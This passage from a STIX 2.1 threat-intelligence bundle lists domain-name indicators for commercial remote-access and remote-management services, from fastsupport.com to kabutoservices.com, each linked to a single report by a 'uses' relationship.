      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: fastsupport.com",
      "pattern": "[domain-name:value = 'fastsupport.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--205fd1a5-5fe6-5d5f-9d0a-23bb54aa6064",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--2d5884be-0b32-5068-bdf1-4bf16a318453"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fa43ff61-b79c-565b-b029-e395e7f2a120",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: fastviewer.com",
      "pattern": "[domain-name:value = 'fastviewer.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a0478919-a71e-51bf-910f-ded0e3943d44",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--fa43ff61-b79c-565b-b029-e395e7f2a120"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--26667c81-ddfb-534f-9652-61a857f412ab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: fixme.it",
      "pattern": "[domain-name:value = 'fixme.it']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--adf24aa4-f782-5a69-8d97-20ad23607df7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--26667c81-ddfb-534f-9652-61a857f412ab"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7bda866e-ef96-58f3-8d10-cceedd376b49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: fleetdeck.io",
      "pattern": "[domain-name:value = 'fleetdeck.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--51264db3-d22b-513f-90f1-c5134c1aee12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--7bda866e-ef96-58f3-8d10-cceedd376b49"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--988c2859-4a55-51c0-9d49-b69d753dfefb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: gatherplace.com",
      "pattern": "[domain-name:value = 'gatherplace.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5ce5b758-d63c-5ce3-a7bf-0365dc4cffda",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--988c2859-4a55-51c0-9d49-b69d753dfefb"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0f7caf82-d69c-576e-a243-cefbc9b5fd71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: gatherplace.net",
      "pattern": "[domain-name:value = 'gatherplace.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--284f9914-7480-5ad8-8210-120303a460c7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--0f7caf82-d69c-576e-a243-cefbc9b5fd71"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--992d8326-c54c-544d-8b33-111a838c2f33",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: getgo.com",
      "pattern": "[domain-name:value = 'getgo.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6d73b2f7-77c7-583f-8fd1-142fb62e0273",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--992d8326-c54c-544d-8b33-111a838c2f33"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c356857e-f292-5159-9e63-149f01cba679",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: getscreen.me",
      "pattern": "[domain-name:value = 'getscreen.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e3527ab3-409c-5f75-b52d-529d4b9cc457",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--c356857e-f292-5159-9e63-149f01cba679"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--94914d66-6190-5e4e-a5a3-33fb14ff55cc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: gotoassist.at",
      "pattern": "[domain-name:value = 'gotoassist.at']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b4cf9923-b3af-56b2-a86d-62d67a52c13b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--94914d66-6190-5e4e-a5a3-33fb14ff55cc"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--52ff0ca9-7ac6-53da-b0eb-3db4c55ec115",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: gotoassist.com",
      "pattern": "[domain-name:value = 'gotoassist.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8a468f90-7378-531a-8b48-9bf18349f7ef",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--52ff0ca9-7ac6-53da-b0eb-3db4c55ec115"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8a349222-2c30-5183-a5b1-9e6807674192",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: gotoassist.me",
      "pattern": "[domain-name:value = 'gotoassist.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aeb45942-059b-5ac6-b8ea-69ccef1381f6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--8a349222-2c30-5183-a5b1-9e6807674192"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e333a0ad-ea01-5dac-952a-aa9fc530de64",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: gotohttp.com",
      "pattern": "[domain-name:value = 'gotohttp.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--58d70548-fc4e-5518-b041-d6f51612e579",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--e333a0ad-ea01-5dac-952a-aa9fc530de64"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3247e01d-ad8f-5a8f-ba2d-1c037f4f46b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: gotoresolve.com",
      "pattern": "[domain-name:value = 'gotoresolve.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0d9fab5b-94f5-50f6-8479-7ae28afff92d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--3247e01d-ad8f-5a8f-ba2d-1c037f4f46b1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--39253b5e-73e1-50ac-bd1e-2e66da9b8ab4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: goverlan.com",
      "pattern": "[domain-name:value = 'goverlan.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--05d8f2b1-3723-5ddf-aa8e-dbef7a3e433e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--39253b5e-73e1-50ac-bd1e-2e66da9b8ab4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--843d801d-a956-5985-a450-dc1494c13aaf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: heartbeatrm.com",
      "pattern": "[domain-name:value = 'heartbeatrm.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--01f17e51-e440-5c7d-aad5-2ae8107bffc6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--843d801d-a956-5985-a450-dc1494c13aaf"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f2acfd9a-473a-5024-94b5-fcd6e3e1fae5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: helpme.net",
      "pattern": "[domain-name:value = 'helpme.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c8b56bc5-fc50-5cf1-844c-3c1e9e9ecd55",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--f2acfd9a-473a-5024-94b5-fcd6e3e1fae5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d20d8fd3-ed4c-5806-bd0a-226d3228a233",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: helpwire.app",
      "pattern": "[domain-name:value = 'helpwire.app']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--87a24b48-3259-5a1d-9669-a2a24aca98eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--d20d8fd3-ed4c-5806-bd0a-226d3228a233"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--befb26b2-947e-5e56-9ee5-b6532e6989a3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: hoptodesk.com",
      "pattern": "[domain-name:value = 'hoptodesk.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b143e6d0-bdc6-5192-9357-6e8f6b918a4e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--befb26b2-947e-5e56-9ee5-b6532e6989a3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6dbf6866-def7-573d-8277-f7fcd8929ee1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: hostedrmm.com",
      "pattern": "[domain-name:value = 'hostedrmm.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--255b25fd-614a-5393-a1bf-1dbf3bd1bb35",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--6dbf6866-def7-573d-8277-f7fcd8929ee1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bdbb12d9-eb09-5899-8f56-2b11b22860af",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: immy.bot",
      "pattern": "[domain-name:value = 'immy.bot']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8529bfa8-5d50-58d6-9531-7d978425cc72",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--bdbb12d9-eb09-5899-8f56-2b11b22860af"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0d582a86-487d-5847-bea9-d4cad443d2bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: immybot.com",
      "pattern": "[domain-name:value = 'immybot.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--10a51bde-0597-5cc0-b2d8-2a11a33e08b5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--0d582a86-487d-5847-bea9-d4cad443d2bc"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--96b8df9f-e5b2-533b-ade8-521fd5e1cb42",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: imperosoftware.com",
      "pattern": "[domain-name:value = 'imperosoftware.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--437765b1-0089-5660-af8b-f6a99901d0a7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--96b8df9f-e5b2-533b-ade8-521fd5e1cb42"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--87897e50-1c2b-5cae-9c51-4bbf18bffadf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: instanthousecall.com",
      "pattern": "[domain-name:value = 'instanthousecall.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7f692f66-87b1-5080-bb8d-4d58e50711ce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--87897e50-1c2b-5cae-9c51-4bbf18bffadf"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a9b1c322-c8c8-5678-89f9-14e2f46dbc87",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: instanthousecall.net",
      "pattern": "[domain-name:value = 'instanthousecall.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--02e1eb66-a7ae-5e90-9765-3eb201ceabd7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--a9b1c322-c8c8-5678-89f9-14e2f46dbc87"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--09379a8d-2bc5-5d83-b9db-a833a085a0d1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: intelliadmin.com",
      "pattern": "[domain-name:value = 'intelliadmin.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--517949fb-aa05-5e5a-b37e-f5b00015da10",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--09379a8d-2bc5-5d83-b9db-a833a085a0d1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fb8af97c-fc6f-518a-9afa-75e5b3614f3a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: internapcdn.net",
      "pattern": "[domain-name:value = 'internapcdn.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--52760565-82f7-5b4d-8398-6594902e0ee3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--fb8af97c-fc6f-518a-9afa-75e5b3614f3a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ab40cfbb-0673-5066-9014-ee269e403ea2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: internetid.ru",
      "pattern": "[domain-name:value = 'internetid.ru']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b87acb95-1fd8-5c16-bc1d-91ee3e2114dc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--ab40cfbb-0673-5066-9014-ee269e403ea2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--216dc0ca-ddd2-5864-bf72-752135164e4a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: iperius-rs.com",
      "pattern": "[domain-name:value = 'iperius-rs.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--47b9cd0f-8e1d-52aa-b89e-0472f09c2bb7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--216dc0ca-ddd2-5864-bf72-752135164e4a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fea360fb-8915-5145-ad22-5e30d6b17015",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: iperius.net",
      "pattern": "[domain-name:value = 'iperius.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c19cc8cc-546e-59bf-bb4d-a96924edf94b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--fea360fb-8915-5145-ad22-5e30d6b17015"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d7d562fa-044a-5a2b-97cb-946886cb3c24",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: iperiusremote.com",
      "pattern": "[domain-name:value = 'iperiusremote.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--df98a292-d244-5d08-9e5b-ca214e597dac",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--d7d562fa-044a-5a2b-97cb-946886cb3c24"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e7151dc7-33a2-5339-a7e8-b213993abd8b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: islonline.com",
      "pattern": "[domain-name:value = 'islonline.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d1d38c90-55a6-56db-b4bf-f49decf92907",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--e7151dc7-33a2-5339-a7e8-b213993abd8b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--337ccd55-3cda-5d77-adb4-8df21a17c9d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: islonline.net",
      "pattern": "[domain-name:value = 'islonline.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5084edc7-3820-597f-84c8-ca823d814ad1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--337ccd55-3cda-5d77-adb4-8df21a17c9d8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1324be77-88fc-5977-b7f0-4a076070d5f7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: itarian.com",
      "pattern": "[domain-name:value = 'itarian.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--807269d8-2e8e-57b1-a8e9-967482d92cf3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--1324be77-88fc-5977-b7f0-4a076070d5f7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0f36a06f-5558-50d3-8bb6-92760705ec03",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: itsupport247.net",
      "pattern": "[domain-name:value = 'itsupport247.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2d4179a8-3690-5395-be58-e79a23cb0451",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--0f36a06f-5558-50d3-8bb6-92760705ec03"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e1a1ca64-500c-5f1d-939f-e5ebf160d3ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: jumpcloud.com",
      "pattern": "[domain-name:value = 'jumpcloud.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3be63b11-5929-5f7f-b8b2-de98fa6515fc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--e1a1ca64-500c-5f1d-939f-e5ebf160d3ee"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4d1484cc-33ca-599e-8629-5fc4790771b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: jumpdesktop.com",
      "pattern": "[domain-name:value = 'jumpdesktop.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3ebe7268-be3b-53f9-826f-9cd971ca7a17",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--4d1484cc-33ca-599e-8629-5fc4790771b7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--41aff6af-4a4a-591f-bdbd-035baa3bb75f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: jumpto.me",
      "pattern": "[domain-name:value = 'jumpto.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--065fef94-9dff-5c29-9382-f67f3f2dd184",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--41aff6af-4a4a-591f-bdbd-035baa3bb75f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c86a4f04-da08-5e0c-b9b1-0c8f7dea4682",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: kabuto.io",
      "pattern": "[domain-name:value = 'kabuto.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bb6babd2-ee37-5b48-aa35-78be62b90ab2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--c86a4f04-da08-5e0c-b9b1-0c8f7dea4682"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a2c883fa-429b-5fc2-bce5-c2f902e93d48",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: kabutoservices.com",
      "pattern": "[domain-name:value = 'kabutoservices.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
